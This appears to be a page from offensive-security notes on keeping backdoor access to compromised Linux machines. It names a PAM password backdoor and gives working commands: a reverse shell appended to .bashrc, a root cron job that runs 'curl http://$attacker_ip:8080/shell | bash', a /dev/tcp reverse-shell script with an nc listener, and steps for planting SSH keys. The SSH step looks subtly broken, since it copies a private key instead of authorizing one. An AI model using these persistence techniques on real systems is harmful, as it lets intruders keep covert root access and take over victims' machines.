Garage door

INFO

A backdoor refers to any method by which authorized and unauthorized users are able to get around normal security measures and gain high level user access (aka root access) on a computer system, network, or software application. They are known for being discreet. Backdoors exist for a select group of people in the know to gain easy access to a system or application.

PAM

INFO

This backdoor essentially consists of adding your own password to the pam_unix.so file

pam_unix.so file is responsible for authentication

pam_unix.so uses the unix_verify_password function to verify to user’s supplied password :

.bashsrc

INFO

If a user has bash as their login shell, the “.bashrc” file in their home directory is executed when an interactive session is launched.

Any user that log in often :

echo 'bash -i >& /dev/tcp/ip/port 0>&1' >> ~/.bashrc

Put a nc listener

CronJob

With a root access

INFO

cronjobs file → /etc/cronjob

Configure a task where every minute a reverse shell is sent to you. Add this line into your cronjob file :

* *     * * *   root    curl http://$attacker_ip:8080/shell | bash

Add this to the shell file :

#!/bin/bash
bash -i >& /dev/tcp/$ip/$port 0>&1

On the attacker machine :

nc -nvlp $port

SSH

INFO

Consists in saving our ssh keys in some user’s home directory. Then we can access it via ssh.

Generate ssh key

ssh-keygen

Copy our key into the user’s .ssh directory

# if no .ssh directory -> create it
mkdir .ssh 
 
cp id_rsa .ssh/id_rsa

❯ RedSquad

Explorer

Backdoors

PAM

.bashsrc

CronJob

With a root access

SSH

Generate ssh key

Copy our key into the user’s .ssh directory

Table of Contents